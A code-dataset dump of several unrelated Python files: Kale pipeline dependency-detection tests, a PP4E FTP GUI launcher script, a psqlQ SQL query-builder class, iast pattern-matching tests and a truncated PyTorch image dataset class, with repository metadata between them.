assert sorted(pipeline.get_step("step2").outs) == ['foo', 'x']
assert sorted(pipeline.get_step("step3").ins) == ['foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_with_parameter(dummy_nb_config):
"""Test dependencies detection with function with parameter."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo(x):
def bar():
print(x)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["foo(5)"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == []
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert sorted(pipeline.get_step("step3").ins) == ['foo']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_with_globals(dummy_nb_config):
"""Test dependencies detection with inner function and globals."""
imports_and_functions = "import math"
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ['''
def foo(x):
def bar():
math.sqrt(x)
bar()
''']
pipeline.add_step(Step(name="step2",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ["foo(5)"]
pipeline.add_step(Step(name="step3",
source=_prepend_to_source(_source,
imports_and_functions)))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline, imports_and_functions)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == []
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert sorted(pipeline.get_step("step3").ins) == ['foo']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_with_pipeline_parameters(dummy_nb_config):
"""Test dependencies are detected with pipeline parameters and globals."""
imports_and_functions = "import math"
pipeline = Pipeline(dummy_nb_config)
pipeline.pipeline_parameters = {"y": (5, 'int')}
_source = ["x = 5"]
pipeline.add_step(Step(name="step1",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ['''
def foo(x):
def bar():
math.sqrt(x + y)
bar()
''']
pipeline.add_step(Step(name="step2",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ["foo(5)"]
pipeline.add_step(Step(name="step3",
source=_prepend_to_source(_source,
imports_and_functions)))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline, imports_and_functions)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == []
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert pipeline.get_step("step2").parameters == {"y": (5, 'int')}
assert sorted(pipeline.get_step("step3").ins) == ['foo']
assert sorted(pipeline.get_step("step3").outs) == []
assert pipeline.get_step("step3").parameters == {"y": (5, 'int')}
def test_dependencies_detection_with_try_except(dummy_nb_config):
"""Test dependencies are detected with functions inside try."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
y = 6
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
try:
def foo():
print(x)
def bar():
print(y)
except:
pass
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ['''
foo()
bar()
''']
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x', 'y']
assert sorted(pipeline.get_step("step2").ins) == ['x', 'y']
assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x', 'y']
assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x', 'y']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_recursive(dummy_nb_config):
"""Test dependencies are detected even with a chain of functions calls."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
print(x)
def bar():
foo()
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["bar()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x']
assert sorted(pipeline.get_step("step2").ins) == ['x']
assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_recursive_different_steps(dummy_nb_config):
"""Test dependencies are detected even with a chain of functions calls."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
def foo():
print(x)
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def bar():
foo()
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["bar()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['foo', 'x']
assert sorted(pipeline.get_step("step2").ins) == ['foo', 'x']
assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_deps_detection_recursive_different_steps_long(dummy_nb_config):
"""Test dependencies are detected even with a long chain of fns calls."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
def init():
print(x)
''']
pipeline.add_step(Step(name="step0", source=_source))
_source = ['''
def foo():
init()
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def bar():
foo()
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["bar()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step0", "step1")
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step0").ins) == []
assert sorted(pipeline.get_step("step0").outs) == ['init', 'x']
assert sorted(pipeline.get_step("step1").ins) == ['init', 'x']
assert sorted(pipeline.get_step("step1").outs) == ['foo', 'init', 'x']
assert sorted(pipeline.get_step("step2").ins) == ['foo', 'init', 'x']
assert (sorted(pipeline.get_step("step2").outs)
== ['bar', 'foo', 'init', 'x'])
assert (sorted(pipeline.get_step("step3").ins)
== ['bar', 'foo', 'init', 'x'])
assert sorted(pipeline.get_step("step3").outs) == []
def test_deps_detection_recursive_different_steps_branch(dummy_nb_config):
"""Test dependencies when fns are passed from multiple branches."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
y = 6
''']
pipeline.add_step(Step(name="step0", source=_source))
_source = ['''
def foo():
print(x)
''']
pipeline.add_step(Step(name="step_l", source=_source))
_source = ['''
def bar():
print(y)
''']
pipeline.add_step(Step(name="step_r", source=_source))
_source = ['''
def result():
foo()
bar()
''']
pipeline.add_step(Step(name="step_m", source=_source))
_source = ["result()"]
pipeline.add_step(Step(name="step_f", source=_source))
pipeline.add_edge("step0", "step_l")
pipeline.add_edge("step0", "step_r")
pipeline.add_edge("step_l", "step_m")
pipeline.add_edge("step_r", "step_m")
pipeline.add_edge("step_m", "step_f")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step0").ins) == []
assert sorted(pipeline.get_step("step0").outs) == ['x', 'y']
assert sorted(pipeline.get_step("step_l").ins) == ['x']
assert sorted(pipeline.get_step("step_l").outs) == ['foo', 'x']
assert sorted(pipeline.get_step("step_r").ins) == ['y']
assert sorted(pipeline.get_step("step_r").outs) == ['bar', 'y']
assert sorted(pipeline.get_step("step_m").ins) == ['bar', 'foo', 'x', 'y']
assert (sorted(pipeline.get_step("step_m").outs)
== ['bar', 'foo', 'result', 'x', 'y'])
assert (sorted(pipeline.get_step("step_f").ins)
== ['bar', 'foo', 'result', 'x', 'y'])
assert sorted(pipeline.get_step("step_f").outs) == []
| 33.392777 | 78 | 0.633137 | # Copyright 2020 The Kale Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from kale import Pipeline, Step
from kale.static_analysis import dependencies
@pytest.mark.parametrize("code,target", [
('', []),
('a = b', ['b']),
('a = foo(b)', ['foo', 'b']),
('a = b\nfoo(b)', ['b', 'foo']),
('foo(b)', ['foo', 'b'])
])
def test_pyflakes_report(code, target):
"""Tests pyflakes_report function."""
res = dependencies.pyflakes_report(code)
assert sorted(res) == sorted(target)
def test_detect_fns_free_variables():
"""Test the function returns the correct free variables."""
source_code = '''
x = 5
def foo():
print(math.sqrt(x))
'''
target = {"foo": ({"x", "math"}, {})}
assert target == dependencies.detect_fns_free_variables(source_code)
def test_detect_fns_free_variables_with_imports():
"""Test the function returns the correct free variables."""
imports_and_functions = """
import math
"""
source_code = '''
x = 5
def foo():
print(math.sqrt(x))
'''
target = {"foo": ({"x"}, {})}
assert target == dependencies.detect_fns_free_variables(
source_code,
imports_and_functions
)
def _prepend_to_source(source, prefix):
return [prefix + "\n" + "\n".join(source)]
def test_dependencies_detection_free_variable(dummy_nb_config):
"""Test dependencies detection with free variables."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
print(x)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ['''
foo()
''']
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ["x"]
assert sorted(pipeline.get_step("step2").ins) == ["x"]
assert sorted(pipeline.get_step("step2").outs) == ["foo", "x"]
assert sorted(pipeline.get_step("step3").ins) == ["foo", "x"]
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_inner_function(dummy_nb_config):
"""Test dependencies detection with inner functions."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
def bar(x):
print(x)
bar(5)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ['''
foo()
print(x)
''']
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x']
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert sorted(pipeline.get_step("step3").ins) == ['foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_inner_function_free_variable(dummy_nb_config):
"""Test dependencies detection with free variables and inner function."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
def bar():
print(x)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["foo()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x']
assert sorted(pipeline.get_step("step2").ins) == ['x']
assert sorted(pipeline.get_step("step2").outs) == ['foo', 'x']
assert sorted(pipeline.get_step("step3").ins) == ['foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_with_parameter(dummy_nb_config):
"""Test dependencies detection with function with parameter."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo(x):
def bar():
print(x)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["foo(5)"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == []
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert sorted(pipeline.get_step("step3").ins) == ['foo']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_with_globals(dummy_nb_config):
"""Test dependencies detection with inner function and globals."""
imports_and_functions = "import math"
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ['''
def foo(x):
def bar():
math.sqrt(x)
bar()
''']
pipeline.add_step(Step(name="step2",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ["foo(5)"]
pipeline.add_step(Step(name="step3",
source=_prepend_to_source(_source,
imports_and_functions)))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline, imports_and_functions)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == []
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert sorted(pipeline.get_step("step3").ins) == ['foo']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_with_pipeline_parameters(dummy_nb_config):
"""Test dependencies are detected with pipeline parameters and globals."""
imports_and_functions = "import math"
pipeline = Pipeline(dummy_nb_config)
pipeline.pipeline_parameters = {"y": (5, 'int')}
_source = ["x = 5"]
pipeline.add_step(Step(name="step1",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ['''
def foo(x):
def bar():
math.sqrt(x + y)
bar()
''']
pipeline.add_step(Step(name="step2",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ["foo(5)"]
pipeline.add_step(Step(name="step3",
source=_prepend_to_source(_source,
imports_and_functions)))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline, imports_and_functions)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == []
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert pipeline.get_step("step2").parameters == {"y": (5, 'int')}
assert sorted(pipeline.get_step("step3").ins) == ['foo']
assert sorted(pipeline.get_step("step3").outs) == []
assert pipeline.get_step("step3").parameters == {"y": (5, 'int')}
def test_dependencies_detection_with_try_except(dummy_nb_config):
"""Test dependencies are detected with functions inside try."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
y = 6
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
try:
def foo():
print(x)
def bar():
print(y)
except:
pass
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ['''
foo()
bar()
''']
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x', 'y']
assert sorted(pipeline.get_step("step2").ins) == ['x', 'y']
assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x', 'y']
assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x', 'y']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_recursive(dummy_nb_config):
"""Test dependencies are detected even with a chain of functions calls."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
print(x)
def bar():
foo()
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["bar()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x']
assert sorted(pipeline.get_step("step2").ins) == ['x']
assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_recursive_different_steps(dummy_nb_config):
"""Test dependencies are detected even with a chain of functions calls."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
def foo():
print(x)
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def bar():
foo()
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["bar()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['foo', 'x']
assert sorted(pipeline.get_step("step2").ins) == ['foo', 'x']
assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_deps_detection_recursive_different_steps_long(dummy_nb_config):
"""Test dependencies are detected even with a long chain of fns calls."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
def init():
print(x)
''']
pipeline.add_step(Step(name="step0", source=_source))
_source = ['''
def foo():
init()
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def bar():
foo()
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["bar()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step0", "step1")
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step0").ins) == []
assert sorted(pipeline.get_step("step0").outs) == ['init', 'x']
assert sorted(pipeline.get_step("step1").ins) == ['init', 'x']
assert sorted(pipeline.get_step("step1").outs) == ['foo', 'init', 'x']
assert sorted(pipeline.get_step("step2").ins) == ['foo', 'init', 'x']
assert (sorted(pipeline.get_step("step2").outs)
== ['bar', 'foo', 'init', 'x'])
assert (sorted(pipeline.get_step("step3").ins)
== ['bar', 'foo', 'init', 'x'])
assert sorted(pipeline.get_step("step3").outs) == []
def test_deps_detection_recursive_different_steps_branch(dummy_nb_config):
"""Test dependencies when fns are passed from multiple branches."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
y = 6
''']
pipeline.add_step(Step(name="step0", source=_source))
_source = ['''
def foo():
print(x)
''']
pipeline.add_step(Step(name="step_l", source=_source))
_source = ['''
def bar():
print(y)
''']
pipeline.add_step(Step(name="step_r", source=_source))
_source = ['''
def result():
foo()
bar()
''']
pipeline.add_step(Step(name="step_m", source=_source))
_source = ["result()"]
pipeline.add_step(Step(name="step_f", source=_source))
pipeline.add_edge("step0", "step_l")
pipeline.add_edge("step0", "step_r")
pipeline.add_edge("step_l", "step_m")
pipeline.add_edge("step_r", "step_m")
pipeline.add_edge("step_m", "step_f")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step0").ins) == []
assert sorted(pipeline.get_step("step0").outs) == ['x', 'y']
assert sorted(pipeline.get_step("step_l").ins) == ['x']
assert sorted(pipeline.get_step("step_l").outs) == ['foo', 'x']
assert sorted(pipeline.get_step("step_r").ins) == ['y']
assert sorted(pipeline.get_step("step_r").outs) == ['bar', 'y']
assert sorted(pipeline.get_step("step_m").ins) == ['bar', 'foo', 'x', 'y']
assert (sorted(pipeline.get_step("step_m").outs)
== ['bar', 'foo', 'result', 'x', 'y'])
assert (sorted(pipeline.get_step("step_f").ins)
== ['bar', 'foo', 'result', 'x', 'y'])
assert sorted(pipeline.get_step("step_f").outs) == []
| 65 | 0 | 23 |
78c473c35f8000f0305c9c536f9c751eafaa1176 | 960 | pyw | Python | PP4E/Examples/PP4E/Internet/Ftp/PyFtpGui.pyw | BeacherHou/Python-_Markdown- | 015d79a02d32f49395b80ca10919b3a09b72c4df | [
"MIT"
] | null | null | null | PP4E/Examples/PP4E/Internet/Ftp/PyFtpGui.pyw | BeacherHou/Python-_Markdown- | 015d79a02d32f49395b80ca10919b3a09b72c4df | [
"MIT"
] | null | null | null | PP4E/Examples/PP4E/Internet/Ftp/PyFtpGui.pyw | BeacherHou/Python-_Markdown- | 015d79a02d32f49395b80ca10919b3a09b72c4df | [
"MIT"
] | null | null | null | """
spawn FTP get and put GUIs no matter what directory I'm run from; os.getcwd is not
necessarily the place this script lives; could also hardcode path from $PP4EHOME,
or guessLocation; could also do: [from PP4E.launchmodes import PortableLauncher,
PortableLauncher('getfilegui', '%s/getfilegui.py' % mydir)()], but need the DOS
console pop up on Windows to view status messages which describe transfers made;
"""
import os, sys
print('Running in: ', os.getcwd())
# PP3E
# from PP4E.Launcher import findFirst
# mydir = os.path.split(findFirst(os.curdir, 'PyFtpGui.pyw'))[0]
# PP4E
from PP4E.Tools.find import findlist
mydir = os.path.dirname(findlist('PyFtpGui.pyw', startdir=os.curdir)[0])
if sys.platform[:3] == 'win':
os.system('start %s\getfilegui.py' % mydir)
os.system('start %s\putfilegui.py' % mydir)
else:
os.system('python %s/getfilegui.py &' % mydir)
os.system('python %s/putfilegui.py &' % mydir)
| 36.923077 | 84 | 0.698958 | """
spawn FTP get and put GUIs no matter what directory I'm run from; os.getcwd is not
necessarily the place this script lives; could also hardcode path from $PP4EHOME,
or guessLocation; could also do: [from PP4E.launchmodes import PortableLauncher,
PortableLauncher('getfilegui', '%s/getfilegui.py' % mydir)()], but need the DOS
console pop up on Windows to view status messages which describe transfers made;
"""
import os, sys
print('Running in: ', os.getcwd())
# PP3E
# from PP4E.Launcher import findFirst
# mydir = os.path.split(findFirst(os.curdir, 'PyFtpGui.pyw'))[0]
# PP4E
from PP4E.Tools.find import findlist
mydir = os.path.dirname(findlist('PyFtpGui.pyw', startdir=os.curdir)[0])
if sys.platform[:3] == 'win':
os.system('start %s\getfilegui.py' % mydir)
os.system('start %s\putfilegui.py' % mydir)
else:
os.system('python %s/getfilegui.py &' % mydir)
os.system('python %s/putfilegui.py &' % mydir)
| 0 | 0 | 0 |
a25b9d90eeaa5ac8fc3c41ceddd288d6914af2ae | 2,290 | py | Python | phiorm/models/query/psqlQ.py | rahungria/phiorm | 8990b5001c9b7c5f5de69a86d2d4314ab62b8bbd | [
"MIT"
] | null | null | null | phiorm/models/query/psqlQ.py | rahungria/phiorm | 8990b5001c9b7c5f5de69a86d2d4314ab62b8bbd | [
"MIT"
] | null | null | null | phiorm/models/query/psqlQ.py | rahungria/phiorm | 8990b5001c9b7c5f5de69a86d2d4314ab62b8bbd | [
"MIT"
] | null | null | null | from phiorm.models.query import query
from phiorm.util import tree
| 30.533333 | 76 | 0.526201 | from phiorm.models.query import query
from phiorm.util import tree
class psqlQ(query.Q):
def __init__(
self,
query:str=None,
left:'tree'=None, right:'tree'=None,
**kwargs
):
self.query = query
self._kwargs = {}
self.negative = False
self.left = left
self.right = right
if not self.query:
# build this object from the first kwarg
for k in kwargs:
self._kwargs = {str(k): kwargs.pop(k)}
self.build_query(**{str(k): self._kwargs[k]})
break
# build all children Q from the rest (defaults to AND)
for k in kwargs:
new_self = type(self)(**self._kwargs)&type(self)(**kwargs)
self.copy_constructor(new_self)
break
super().__init__(
data=self, left=self.left, right=self.right, **self._kwargs
)
def build_query(self, **kwargs):
assert len(kwargs) == 1
for k in kwargs:
if kwargs[k] is None:
self.query = f"{k} IS %({k})s"
else:
self.query = f"{k}=%({k})s"
def copy_constructor(self, new: 'psqlQ'):
self.query = new.query
self._kwargs = new._kwargs
self.negative = new.negative
self.left = new.left
self.right = new.right
self.data = new.data
def __invert__(self) -> 'psqlQ':
inv = type(self)(query=self.query, left=self.left, right=self.right)
inv.negative = self.negative
if not inv.negative:
inv.query = inv.query.replace('=', '!=').replace('IS', 'IS NOT')
else:
inv.query = inv.query.replace('!=', '=').replace('IS NOT', 'IS')
inv.negative = not inv.negative
return inv
def __and__(self, other: 'psqlQ') -> 'psqlQ':
q = type(self)(query="AND", left=self, right=other)
return q
def __or__(self, other: 'psqlQ') -> 'psqlQ':
q = type(self)(query="OR", left=self, right=other)
return q
def evaluate(self):
return ' '.join(q.query for q in self.inorder())
def kwargs(self):
d = {}
for q in self.inorder():
d.update(q._kwargs)
return d
| 1,983 | 0 | 238 |
31119da69ba8230efe29da46c6c47252618f2da5 | 3,754 | py | Python | tests/test_pattern.py | brandjon/iast | 23961536c3bfb5d8fce39c28214ea88b8072450c | [
"PSF-2.0"
] | 11 | 2015-01-04T08:40:09.000Z | 2021-03-24T03:56:34.000Z | tests/test_pattern.py | brandjon/iast | 23961536c3bfb5d8fce39c28214ea88b8072450c | [
"PSF-2.0"
] | null | null | null | tests/test_pattern.py | brandjon/iast | 23961536c3bfb5d8fce39c28214ea88b8072450c | [
"PSF-2.0"
] | null | null | null | """Unit tests for pattern.py."""
import unittest
from iast.python.default import parse, make_pattern, Num, BinOp, Add, Mult
from iast.pattern import *
from iast.pattern import match_step
if __name__ == '__main__':
unittest.main()
| 33.81982 | 74 | 0.515184 | """Unit tests for pattern.py."""
import unittest
from iast.python.default import parse, make_pattern, Num, BinOp, Add, Mult
from iast.pattern import *
from iast.pattern import match_step
class PatternCase(unittest.TestCase):
def pat(self, source):
return make_pattern(parse(source))
def pe(self, source):
return parse(source).body[0].value
def pate(self, source):
return self.pat(source).body[0].value
def test_match_step(self):
# Simple.
result = match_step(PatVar('_X'), Num(1))
exp_result = ([], {'_X': Num(1)})
self.assertEqual(result, exp_result)
# Wildcard.
result = match_step(Wildcard(), Num(1))
exp_result = ([], {})
self.assertEqual(result, exp_result)
# Var on RHS.
result = match_step(Num(1), PatVar('_X'))
exp_result = ([], {'_X': Num(1)})
self.assertEqual(result, exp_result)
# Redundant equation.
result = match_step(PatVar('_X'), PatVar('_X'))
exp_result = ([], {})
self.assertEqual(result, exp_result)
# Circular equation.
with self.assertRaises(MatchFailure):
match_step(PatVar('_X'), BinOp(PatVar('_X'), Add(), Num(1)))
# Nodes, constants.
result = match_step(Num(1), Num(1))
exp_result = ([(1, 1)], {})
self.assertEqual(result, exp_result)
with self.assertRaises(MatchFailure):
match_step(Num(1), BinOp(Num(1), Add(), Num(2)))
with self.assertRaises(MatchFailure):
match_step(1, 2)
# Tuples.
result = match_step((1, 2), (1, 2))
exp_result = ([(1, 1), (2, 2)], {})
self.assertEqual(result, exp_result)
with self.assertRaises(MatchFailure):
match_step((1, 2), (1, 2, 3))
def test_match(self):
result = match(self.pat('((_X, _Y), _Z + _)'),
self.pat('((1, _Z), 2 + 3)'))
exp_result = {
'_X': Num(1),
'_Y': Num(2),
'_Z': Num(2),
}
self.assertEqual(result, exp_result)
result = match(1, 2)
self.assertEqual(result, None)
def test_pattrans(self):
class Trans(PatternTransformer):
rules = [
# Constant-fold addition.
(BinOp(Num(PatVar('_X')), Add(), Num(PatVar('_Y'))),
lambda _X, _Y: Num(_X + _Y)),
# Constant-fold left-multiplication by 0,
# defer to other rules.
(BinOp(Num(PatVar('_X')), Mult(), Num(PatVar('_Y'))),
lambda _X, _Y: Num(0) if _X == 0 else NotImplemented),
# Constant-fold right-multiplication by 0,
# do not defer to other rules.
(BinOp(Num(PatVar('_X')), Mult(), Num(PatVar('_Y'))),
lambda _X, _Y: Num(0) if _Y == 0 else None),
# Constant-fold multiplication, but never gets
# to run since above rule doesn't defer.
(BinOp(Num(PatVar('_X')), Mult(), Num(PatVar('_Y'))),
lambda _X, _Y: Num(_X * _Y)),
]
# Bottom-up; subtrees should be processed first.
tree = parse('1 + (2 + 3)')
tree = Trans.run(tree)
exp_tree = parse('6')
self.assertEqual(tree, exp_tree)
# NotImplemented defers to third rule, None blocks last rule.
tree = parse('(5 * 2) * ((3 * 0) - 1)')
tree = Trans.run(tree)
exp_tree = parse('(5 * 2) * (0 - 1)')
self.assertEqual(tree, exp_tree)
if __name__ == '__main__':
unittest.main()
| 3,289 | 16 | 209 |
93d2f527097223517648213bbf23f839ac7551a3 | 748 | py | Python | sanity_check/dataset.py | skn123/GaborNet | 26c10d3fd4b2a82239c52bb60ca9659fb98456ac | [
"MIT"
] | 51 | 2019-03-10T13:01:45.000Z | 2022-03-31T08:34:54.000Z | sanity_check/dataset.py | skn123/GaborNet | 26c10d3fd4b2a82239c52bb60ca9659fb98456ac | [
"MIT"
] | 16 | 2019-07-24T06:58:12.000Z | 2021-05-07T07:28:21.000Z | sanity_check/dataset.py | skn123/GaborNet | 26c10d3fd4b2a82239c52bb60ca9659fb98456ac | [
"MIT"
] | 19 | 2019-11-20T02:14:49.000Z | 2022-03-29T08:46:33.000Z | from __future__ import division
from __future__ import print_function
import os
from skimage import io
from torch.utils.data import Dataset
| 26.714286 | 67 | 0.667112 | from __future__ import division
from __future__ import print_function
import os
from skimage import io
from torch.utils.data import Dataset
class DogsCatsDataset(Dataset):
def __init__(self, root_dir: str, transform=None):
self.root_dir = root_dir
self.pics_list = os.listdir(self.root_dir)
self.transform = transform
def __len__(self):
return len(self.pics_list)
def __getitem__(self, idx):
